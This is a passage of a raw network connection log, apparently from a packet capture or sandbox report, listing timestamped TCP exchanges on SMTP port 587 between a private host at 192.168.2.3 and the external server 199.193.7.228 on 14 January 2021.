Jan 14, 2021 08:01:43.430830002 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.430850029 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.431041002 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.433373928 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.437345028 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.437361002 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.437371016 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.437391996 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.437417030 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.437494040 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.437588930 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.438947916 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.441931009 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.482357979 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.482379913 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.482480049 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.482518911 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.485887051 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.485965967 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.527340889 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.527363062 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.527465105 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.527534008 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.534173965 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.534188986 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.534898996 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.535070896 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.535279036 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.535392046 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.558326960 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.558459044 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.627650976 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.627731085 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.627815008 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.627866030 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.627892017 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.627917051 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.627959967 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.627971888 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.628310919 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.628325939 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.628339052 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.628437042 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.628726006 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.635668993 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.638381004 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.672389030 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.672410011 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.674942017 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.675760031 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.675776005 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.675885916 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.717565060 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.717583895 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.717653036 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.717777967 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.725666046 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.725824118 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.745290995 CET	587	49806	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.750307083 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.751010895 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.799007893 CET	49806	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.817975998 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.818120003 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.818201065 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.818449020 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.818499088 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.818548918 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.818548918 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.818612099 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.818650007 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.818675995 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.818814039 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.818844080 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.819088936 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.819708109 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.819891930 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.828923941 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.829294920 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.829917908 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.864886045 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.864952087 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.865029097 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.865281105 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.865641117 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.865745068 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.908010960 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.908032894 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.908119917 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.908339977 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:43.941323996 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.941509962 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:43.941972017 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.008430004 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.008744955 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.008810997 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.008826971 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.009022951 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.009823084 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.009843111 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.009929895 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.010015965 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.010040998 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.010137081 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.010190010 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.011193037 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.011660099 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.019892931 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.021091938 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.055243015 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.055272102 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.055821896 CET	587	49802	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.055960894 CET	49802	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.098606110 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.098884106 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.132210970 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.132791042 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.198570013 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.198700905 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.199157953 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.199345112 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.199357033 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.199539900 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.199552059 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.199664116 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.199734926 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.199860096 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.200139999 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.200182915 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.200249910 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.200371981 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.200474977 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.200594902 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.200762033 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.201270103 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.201332092 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.201339960 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.201390982 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.201414108 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.201451063 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.201462984 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.201512098 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.201695919 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.201765060 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.211153030 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.211182117 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.211256027 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.211375952 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.228070021 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.229146957 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.289378881 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.289412022 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.289422989 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.289489985 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.289544106 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.323100090 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.323184967 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.323214054 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.323291063 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.325577974 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.327358007 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.391329050 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391346931 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391356945 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391371012 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391382933 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391392946 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391403913 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391416073 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391467094 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.391519070 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.391561031 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391571999 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391582966 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.391818047 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.392067909 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.392479897 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.392654896 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.418106079 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.418126106 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.419101000 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.419646978 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.420110941 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.479685068 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.479826927 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.515902996 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.515957117 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.518570900 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.518595934 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.519165039 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.581649065 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.581672907 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.581746101 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.581814051 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.582824945 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.582921982 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.583784103 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.583857059 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.583893061 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.583935022 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.583981991 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.583982944 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.583993912 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.584131002 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.584218979 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.584230900 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.584300995 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.584450006 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.584860086 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.585258007 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.585544109 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.585902929 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.587331057 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.587419987 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.610114098 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.670006037 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.670025110 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.670121908 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.709419966 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.772129059 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.772157907 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.772280931 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.775322914 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.775346994 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.775355101 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.775366068 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.775373936 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.775532961 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.775626898 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.775640965 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.775903940 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.777441025 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.777538061 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.860279083 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.860304117 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.860346079 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.860430002 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.860467911 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.962743044 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.965167999 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.965631008 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.965701103 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.965811014 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.965965033 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.965979099 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.966195107 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.966207027 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.966308117 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.966370106 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.966618061 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.967544079 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:44.967606068 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:44.967856884 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.050564051 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.050586939 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.052781105 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.155416965 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.155443907 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.155642033 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.156018019 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.156085014 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.156374931 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.156388044 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.156491041 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.156608105 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.156619072 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.156716108 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.156853914 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.157021046 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.157799959 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.157901049 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.158318043 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.243129015 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.243170977 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.243295908 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.345813036 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.345833063 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.346235037 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.346532106 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.346590996 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.346668005 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.346707106 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.346748114 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.346777916 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.346843958 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.346956968 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.347290993 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.347313881 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.347330093 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.347489119 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.347840071 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:45.348249912 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.433542013 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.433578968 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.433655977 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.536453962 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.536629915 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.536732912 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.536811113 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.536830902 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.536967993 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.537003994 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.537416935 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.537452936 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.537568092 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.537776947 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.559772015 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:45.611627102 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:46.382091999 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:46.572263956 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:46.573751926 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:46.573780060 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:46.574234962 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:46.574781895 CET	49805	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:46.765023947 CET	587	49805	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:47.657814026 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:47.848234892 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:47.848350048 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.039824009 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.040148973 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.229991913 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.230098009 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.230492115 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.420342922 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.421030045 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.611164093 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.611212015 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.611241102 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.613069057 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.613991022 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.614203930 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.615016937 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.615602016 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.712693930 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.713702917 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.804089069 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.804115057 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.804966927 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.805354118 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.806328058 CET	587	49809	199.193.7.228	192.168.2.3
